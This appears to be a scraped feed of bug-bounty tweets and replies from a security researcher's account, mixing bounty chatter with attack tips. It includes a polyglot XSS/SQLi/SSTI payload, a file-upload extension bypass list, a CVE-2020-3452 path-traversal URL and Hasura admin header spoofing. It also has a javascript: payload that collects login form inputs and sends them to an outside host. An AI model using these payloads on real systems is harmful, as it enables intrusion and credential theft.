Hossam Sec

To test XSS + SQLi + SSTI/CSTI with the same payload use : '"><svg/onload=prompt(5);>{{7*7}} ' ==> for Sql injection "><svg/onload=prompt(5);> ==> for XSS {{7*7}} ==> for SSTI/CSTI #bugbounty #infosec #TogetherWeHitHarder #bugbountyprotip #Pentesting #bugbountytips by me !

Iam in India with @StandoffBB team Behold for the talk in 13/SEP in @bsidesahmedabad With a so interesting topics I will talk about 1 sourcegraph dorking 2IDORS /BAC via authorize burp Ext 3 with &without AI 4 AI chatbot hacking 5 Prompt from AI to other AI (Build your method in UI) 6 VirusTotal V2 scrip 7 #bugbountytip #bugbountytips a lot of tips #bugbounty

Come back #Soon

An Awesome Account Takeover just by adding .json on endpoint by @SalahHasoneh1 #bugbounty #bugbountytip

@alicanact60 Great which program you reported these bugs ?

Don't forget to check the responses. Maybe you can find some tokens like email/account confirmation token. I found a token in response and went to mailbox. The email verification link was xx+.com/verify?token={Token}. And I saw they are same tokens! #BugBountyTips #BugBountyTip

Im curious... #bugbounty hunters out there... whats your age?

New tool to TBHM Recon, Favion Analysis with FavFreak by @0xAsm0d3us: github.com/devanshbatham/…

@thedawgyg @Hacker0x01 Great can i know what are the types pf the bugs ?

@thedawgyg @Hacker0x01 Great is that for subdomain of main domain or acquisition or a a domain belongs to vzm ?

Yay, I was awarded a $128,000 in bounties on @Hacker0x01! hackerone.com/dawgyg #TogetherWeHitHarder

Extension list for File upload bugs ASP: ".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer", "shtml" PHP: php, php5, php3, php2, shtml, html, .php.png(double extension attack)

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ Happy Hacking!

@threatintelctr @D0rkerDevil Any exploit code ?

🚨 NEW: CVE-2020-12640 🚨 Roundcube Webmail before 1.4.4 allows attackers to include local files and execute code via directory traversal in a plugin name to rcube_plugin_api.php. Severity: CRITICAL github.com/roundcube/roun…

@Shubham_4500 @Hacker0x01 Great what was the bug

Yay, I was awarded a $3,000 bounty on @Hacker0x01! hackerone.com/cuso4 #TogetherWeHitHarder Gonna make this month my personal highest earning. 🙂

@bbinfosec @troyhunt Link ?

Interesting Hasura GraphQL Framework Access Control Issue. Found an authenticated endpoint "/script" Added two headers to the existing request: X-Hasura-Role: admin X-Hasura-User-Id: 0 Was able to query as admin 😀

When you find XSS over open redirect on sign-in/up pages, just capture the credentials and hijack them 😉 PoC: javascript:inpts=document.querySelectorAll('input');info='';for(i=0;i<inpts.length;i++){info+=','+inputs[i].value};location.href='https://xhze.em/?'+info #bugbountytip

@pyn3rd Can you share the exploit

@HossamSec pre-auth

Apache Zeppelin pop-up Calculator

@0xPMD Why

What the fuck?

@ITSecurityguard Wut

Love is Love 🏳️‍🌈

@nnwakelam @0x_saudi Thanks leet

@HossamSec @0x_saudi Proxy -> Options -> Response Modification